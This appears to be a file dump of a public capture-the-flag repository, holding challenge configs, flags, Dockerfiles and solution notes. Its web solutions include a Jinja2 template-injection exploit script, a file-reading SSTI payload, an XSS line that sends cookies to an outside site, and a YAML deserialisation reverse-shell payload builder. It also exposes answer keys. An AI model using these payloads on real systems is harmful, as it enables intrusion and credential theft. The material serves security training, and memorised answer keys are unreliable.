| # copy every content from the local file to the image 10 | COPY . 
/app 11 | 12 | ENTRYPOINT ["sh"] 13 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/README.md: -------------------------------------------------------------------------------- 1 | This docker container is to be pointed to by the domain `http://cbajiksuioweqhjlsakfgoi.blahaj.sg` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | decryptorfiles: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python3 /app/main.py -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "blahajOS!" 2 | author: "scuffed" 3 | category: rev 4 | description: I managed to rip this OS image off a retro computer, but I can't gain access. Help me out! (to run the OS, run `qemu-system-x86_64 -drive format=raw,file=os.img`. To help you with the hacking of the program, the source code in assembly for the first sector of the OS has been provided.) 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{B105_INTs} 13 | 14 | files: 15 | - dist/boot.asm 16 | - dist/os.img 17 | 18 | state: visible 19 | 20 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/dist/os.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajos/dist/os.img -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/solution.md: -------------------------------------------------------------------------------- 1 | Recognise that the password is being checked backwards because of the `std` instruction, which sets the direction flag so that string instructions walk memory in reverse. Patch out the wait by zeroing out `0x0f73` and `0x1400` from the binary so that the sleep becomes 0 seconds rather than 3 days. 2 | 3 | Flag: `blahaj{B105_INTs}` -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Club Classics 2 | author: scuffed 3 | category: rev 4 | description: "DJ, fix this mix!!!" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{BlaH4j_15_BRAT} 13 | 14 | state: visible 15 | version: "0.1" 16 | -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/solution.md: -------------------------------------------------------------------------------- 1 | Deobfuscate the JS in the HTML with some online tool, identify how to interact with the WASM. Reverse a few bit manipulation operations to get the flag. 
2 | 3 | flag: `blahaj{BlaH4j_15_BRAT}` -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM lipanski/docker-static-website:latest 2 | 3 | # Copy your static files 4 | COPY . . 5 | 6 | CMD ["/busybox-httpd", "-f", "-v", "-p", "8000"] -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | clubclassics: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/module.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/clubclassics/src/module.wasm -------------------------------------------------------------------------------- /Challenges/Rev/covfefe/challenge.yml: -------------------------------------------------------------------------------- 1 | name: covfefe 2 | author: scuffed 3 | category: rev 4 | description: Covfefe (/koʊˈfɛfi/ koh-FEF-ee, /kəvˈfeɪfeɪ, koʊˈfɛfeɪ/) is a word. 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | files: 12 | - dist/Covfefe.jar 13 | 14 | flags: 15 | - blahaj{BaSESixTy4riNGy0u} 16 | 17 | state: visible 18 | version: "0.1" 19 | -------------------------------------------------------------------------------- /Challenges/Rev/covfefe/dist/Covfefe.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/covfefe/dist/Covfefe.jar -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "crackme2" 2 | author: "scuffed" 3 | category: rev 4 | description: You can crack this file too, right? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{r3v_15nt_7h47_h4rd!} 13 | 14 | # Link all files in dist 15 | files: 16 | - dist/crackme2 17 | 18 | # The state of the challenge. 19 | # If the field is omitted, the challenge is visible by default. 20 | # If provided, the field can take one of two values: hidden, visible. 21 | state: visible 22 | 23 | # Specifies what version of the challenge specification was used. 24 | # Subject to change until ctfcli v1.0.0 25 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/dist/crackme2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/crackme2/dist/crackme2 -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/solution.md: -------------------------------------------------------------------------------- 1 | Literally trivial. 
XOR sweep should one shot this challenge. 2 | 3 | Flag: `blahaj{r3v_15nt_7h47_h4rd!}` -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "funny cats" 2 | author: "scuffed" 3 | category: rev,foren 4 | description: Hello vros... I've made a program that generates a bunch of funny cats. That's all! There are even some sample cats that someone else generated, for your viewing pleasure. Run the `main` program to generate your own! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{STEGANOKITTIES} 13 | 14 | files: 15 | - dist/funny_cat_1.bmp 16 | - dist/funny_cat_2.bmp 17 | - dist/funny_cat_3.bmp 18 | - dist/main 19 | 20 | state: visible 21 | 22 | version: "0.1" 23 | -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/.gitignore: -------------------------------------------------------------------------------- 1 | main.spec 2 | -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_1.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_1.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_2.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_2.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/funny_cat_3.bmp: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/funny_cat_3.bmp -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/dist/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/funnycats/dist/main -------------------------------------------------------------------------------- /Challenges/Rev/funnycats/solution.md: -------------------------------------------------------------------------------- 1 | Identify that `main` is actually a PyInstaller program, decompile it with pycdc, and deobfuscate the recovered source code. Realise that it uses a variant of steganography to hide its key material in the sample images: a generated key is RSA-encrypted and then used by Blowfish (a hybrid scheme à la WannaCryptor), with the RSA PEM stored in cat 1, the encrypted key stored in cat 2 and the Blowfish-encrypted contents of passwd stored in cat 3. 2 | 3 | Flag: `blahaj{STEGANOKITTIES}` -------------------------------------------------------------------------------- /Challenges/Rev/iloveyou/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "ILOVEYOU" 2 | author: "scuffed" 3 | category: rev 4 | description: "Kindly check the attached love letter from me!\n\nDisclaimer: This challenge may trip Windows Defender or any other antivirus solution you have installed. **The file included with this challenge is perfectly safe and will not cause any impact to your computer.** It's advised to simply make an exception for this challenge rather than switching off your antivirus." 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{7hW0mP3d_tH47_PC0de_jU5T_f0r_fUN} 13 | 14 | files: 15 | - dist/LOVE_LETTER_FOR_YOU.doc 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/iloveyou/dist/LOVE_LETTER_FOR_YOU.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/iloveyou/dist/LOVE_LETTER_FOR_YOU.doc -------------------------------------------------------------------------------- /Challenges/Rev/lookma/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Look Ma, No Newlines!" 2 | author: "Java" 3 | category: rev,crypto 4 | description: print(chr(sum(range(ord(min(str(not()))))))) 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{r3v_ch41_v5_hydr4u1ic_pr3s5} 13 | 14 | files: 15 | - dist/challenge.py 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/lookma/dist/challenge.py: -------------------------------------------------------------------------------- 1 | (e:=[ord(c)-46 for c in input("What's the flag? ")],o:="".join(chr(sum((e[i]*(5**f)**i)for i in range(len(e)))%79+46)for f in range(len(e))),print(["Nope, try again.","You got it!"][o==r"OjyF9Sr@JdtZLTp7efyD`ZzQ9gS]x7\=iMM"])) -------------------------------------------------------------------------------- /Challenges/Rev/powerfulshell/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | 1. Wait for "Enter flag" prompt 3 | 2. 
Process hacker can just pluck the flag from memory, just search for blahaj{ 4 | 5 | Funny solve: 6 | Write script to reverse the program 7 | 8 | Funnier solve: 9 | Manually reverse all 20+ layers of encoding 10 | 11 | Flag: `blahaj{p0w3rFu1L_ShEl1}` -------------------------------------------------------------------------------- /Challenges/Rev/smuay/challenge.yml: -------------------------------------------------------------------------------- 1 | name: smuay 2 | author: warri 3 | category: rev 4 | description: | 5 | > smuay smuoy smuiy siuuuuuuuuuuu 6 | > No free smooys for you though muahahaha 7 | 8 | flags: 9 | - blahaj{0000522226522235265310522301464235652301522311056110561101111011142311153115223111534305614342222343} -------------------------------------------------------------------------------- /Challenges/Rev/smuay/dist/smuay: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/smuay/dist/smuay -------------------------------------------------------------------------------- /Challenges/Rev/smuay/sol/smuay.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/smuay/sol/smuay.i64 -------------------------------------------------------------------------------- /Challenges/Rev/timeandplace/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Time and Place" 2 | author: "scuffed" 3 | category: rev 4 | description: My Temp folder has been filled up with a bunch of empty cache directories??? And there's some weird file in there as well??? Send help pls... 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{totally_legit_temp_folders_:333} 13 | 14 | files: 15 | - dist/dist.zip 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/timeandplace/dist/dist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/timeandplace/dist/dist.zip -------------------------------------------------------------------------------- /Challenges/Rev/unsafepdf/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Unsafe PDF" 2 | author: "scuffed" 3 | category: rev 4 | description: They've put javascript in my PDF!! Get it out of there!!! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{PDF_0bj3c7_HuN7} 13 | 14 | # Link all files in dist 15 | files: 16 | - dist/silly_document.pdf 17 | 18 | # The state of the challenge. 19 | # If the field is omitted, the challenge is visible by default. 20 | # If provided, the field can take one of two values: hidden, visible. 21 | state: visible 22 | 23 | # Specifies what version of the challenge specification was used. 
24 | # Subject to change until ctfcli v1.0.0 25 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/unsafepdf/dist/silly_document.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/unsafepdf/dist/silly_document.pdf -------------------------------------------------------------------------------- /Challenges/Web/README.md: -------------------------------------------------------------------------------- 1 | Web Challenges -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/challenge.yml: -------------------------------------------------------------------------------- 1 | name: SSTI-Golf 2 | author: FS 3 | category: web 4 | description: | 5 | > I got bored of code-golfing so I decided to come up with ssti-golfing. 6 | 7 | flags: 8 | - blahaj{c0nf1g_v4r14bl35_f7w} -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/dist/dist.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/SSTIgolf/dist/dist.zip -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | payloads = [ 3 | '{{config.update({"u":config.update})}}', 4 | '{{config.u({"a":"".__class__.mro()})}}', 5 | '{{config.u({"b":"__subclasses__"})}}', 6 | 
'{{config.u({"c":config.a[1]})}}', 7 | '{{config.u({"d":config.c[config.b]})}}', 8 | '{{config.u({"e":config.d()[357]})}}', 9 | "{{config.e('flag.txt').read()}}" 10 | ] 11 | 12 | for i in payloads: 13 | resp=requests.post("http://127.0.0.1:8000/greet",data={"comment":i}) 14 | print(resp.content) 15 | if (b"werkzeug.routing.matcher.StateMachineMatcher" in resp.content): 16 | print(resp.content.find(b"werkzeug.routing.matcher.StateMachineMatcher")) 17 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN chmod 444 /app 17 | 18 | # configure the container to run in an executed manner 19 | ENTRYPOINT [ "python" ] 20 | 21 | CMD ["app.py" ] -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | ssti-golf: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{c0nf1g_v4r14bl35_f7w} 2 | -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/SSTIgolf/src/static/images/golf.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/SSTIgolf/src/static/images/golf.jpg -------------------------------------------------------------------------------- /Challenges/Web/babysql/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabySQL 2 | author: FS 3 | category: web 4 | description: | 5 | > Word around the corner is that a group of hackers opened up an online shop aimed at robbing people of their money. We suspect that the shop uses SQL to query its db and we need your help to steal the admin credentials and take down the shop. 
6 | 7 | flags: 8 | - blahaj{sQLi_iS_c00l} -------------------------------------------------------------------------------- /Challenges/Web/babysql/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.9-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | # configure the container to run in an executed manner 17 | ENTRYPOINT [ "python" ] 18 | 19 | CMD ["app.py" ] 20 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/database.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/babysql/src/database.db -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babysql: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/requirements.txt: -------------------------------------------------------------------------------- 1 | flask~=1.1.4 2 | waitress==3.0.1 -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/schema.sql: -------------------------------------------------------------------------------- 1 | DROP TABLE IF EXISTS USERS_ZAHSHBSH; 2 | DROP TABLE IF EXISTS PRODUCTS; 3 | DROP TABLE IF EXISTS PRIV_USERS; 4 | 5 | CREATE TABLE USERS_ZAHSHBSH( 6 | id SERIAL PRIMARY KEY, 7 | username varchar(255) UNIQUE NOT NULL, 8 | password varchar(255) UNIQUE NOT NULL, 9 | is_admin INTEGER DEFAULT 0 10 | ); 11 | 12 | CREATE TABLE PRIV_USERS( 13 | id SERIAL PRIMARY KEY, 14 | username varchar(255) UNIQUE NOT NULL, 15 | password varchar(255) UNIQUE NOT NULL, 16 | is_admin INTEGER DEFAULT 1 17 | ); 18 | 19 | CREATE TABLE PRODUCTS( 20 | id SERIAL PRIMARY KEY, 21 | description varchar(255) UNIQUE NOT NULL, 22 | price varchar(255) UNIQUE NOT NULL 23 | ); -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/static/css/style.css: -------------------------------------------------------------------------------- 1 | h1 { 2 | border: 2px #eee solid; 3 | color: grey; 4 | text-align: center; 5 | padding: 10px; 6 | font-family: Arial, Helvetica, sans-serif; 7 | font-weight: normal; 8 | font-size: 20px; 9 | } -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/admin.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | ADMIN PAGE 7 | 8 | 9 | 10 |

blahaj{sQLi_iS_c00l}

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Blahaj Shop 7 | 8 | 9 | 10 |

Head to /login to login to product management portal or to /register to register new user

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/product.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Products 7 | 8 | 9 | 10 |

Welcome, {{ username }}! Browse our products below (e.g. enter blahaj to view blahaj products):

11 | 12 |
13 | 14 | 15 |
16 | 17 |
18 | {% for product in products %} 19 |
20 |

{{ product['name'] }}

21 | {{ product['name'] }} 22 |

{{ product['description'] }}

23 |

Price: {{ product['price'] }}

24 |
25 | {% endfor %} 26 |
27 | 28 | 29 | -------------------------------------------------------------------------------- /Challenges/Web/babysql/src/templates/user.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | ADMIN PAGE 7 | 8 | 9 | 10 |

You can navigate to /messages for updates from admin

11 | 12 | 13 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/challenge.yml: -------------------------------------------------------------------------------- 1 | name: BabySSTI 2 | author: fern 3 | category: web 4 | description: Can you hack this website and get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{SsT1_ExpL01T} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | `{{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}` -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | babyssti: 3 | privileged: false 4 | build: . 
5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/flag.txt: -------------------------------------------------------------------------------- 1 | Congratulations! The flag is: blahaj{SsT1_ExpL01T} -------------------------------------------------------------------------------- /Challenges/Web/babyssti/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/calculator/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Calculator 2 | author: fern 3 | category: web 4 | description: I wrote this simple calculator app! Try to hack it and steal the admin cookie! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{3VaL_i5_WeIrD} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste this command: 4 | ``` 5 | 2+2, window.location.href = `[website]`+document.cookie 6 | ``` 7 | 8 | OR: 9 | 10 | ``` 11 | [2+2, window.location.href = `[website]`+document.cookie] 12 | ``` 13 | 14 | For some weird reason, eval can take (and evaluate) >1 argument. Do note that you can also use arrays if you were unaware of that. 
-------------------------------------------------------------------------------- /Challenges/Web/calculator/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | RUN apk update 11 | RUN apk add chromium 12 | # install the dependencies and packages in the requirements file 13 | RUN pip install -r requirements.txt 14 | 15 | # copy every content from the local file to the image 16 | COPY . /app 17 | 18 | # configure the container to run in an executed manner 19 | ENTRYPOINT [ "python" ] 20 | 21 | CMD ["app.py" ] 22 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | calculator: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/calculator/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 -------------------------------------------------------------------------------- /Challenges/Web/compressor/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Data compressor 2 | author: fern 3 | category: web 4 | description: Compress your JSON data with this new service! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Y4mL_n0T_S3cUre} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/soln/soln.py: -------------------------------------------------------------------------------- 1 | # msfvenom -p cmd/unix/reverse_python LHOST=[your ip] LPORT=[port] -f raw 2 | import zlib, base64 3 | hack = """!!python/object/apply:subprocess.Popen 4 | - !!python/tuple 5 | - python3 6 | - -c 7 | - "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('[SOME CODE]')[0])))" 8 | """ 9 | compressed_yaml = zlib.compress(hack.encode()) 10 | # Encode compressed YAML to Base64 11 | base64_yaml = base64.b64encode(compressed_yaml).decode() 12 | print(base64_yaml) -------------------------------------------------------------------------------- /Challenges/Web/compressor/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | See the solution in `soln/`. The payload only works if the service deserialises the submitted YAML with a loader that honours `!!python/object/apply` tags (the server code is not shown here, so this is inferred from the payload); parsing untrusted input with `yaml.safe_load` rejects such tags. -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . 
/app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | compressor: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | waitress==2.1.2 3 | PyYAML==6.0.1 -------------------------------------------------------------------------------- /Challenges/Web/compressor/src/secretflag.txt: -------------------------------------------------------------------------------- 1 | blahaj{Y4mL_n0T_S3cUre} -------------------------------------------------------------------------------- /Challenges/Web/fanpage/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Blahaj Fanpage 2 | author: fern 3 | category: web 4 | description: Check out my new fanpage for Blahaj! 
5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Jwt_BrUt3f0Rc3_9291} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Brute-force the JWT's HS256 signing secret: it is `i-love-shark`, which can be found in rockyou.txt. The underlying weakness is a signing key taken from a common wordlist; a long, randomly generated secret keeps forged tokens from validating. -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # install the dependencies and packages in the requirements file 11 | RUN pip install -r requirements.txt 12 | 13 | # copy every content from the local file to the image 14 | COPY . /app 15 | 16 | RUN adduser --uid 1001 -D nonroot 17 | USER 1001 18 | 19 | # configure the container to run in an executed manner 20 | ENTRYPOINT [ "python" ] 21 | 22 | CMD ["app.py" ] 23 | -------------------------------------------------------------------------------- /Challenges/Web/fanpage/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | fanpage: 3 | privileged: false 4 | build: .
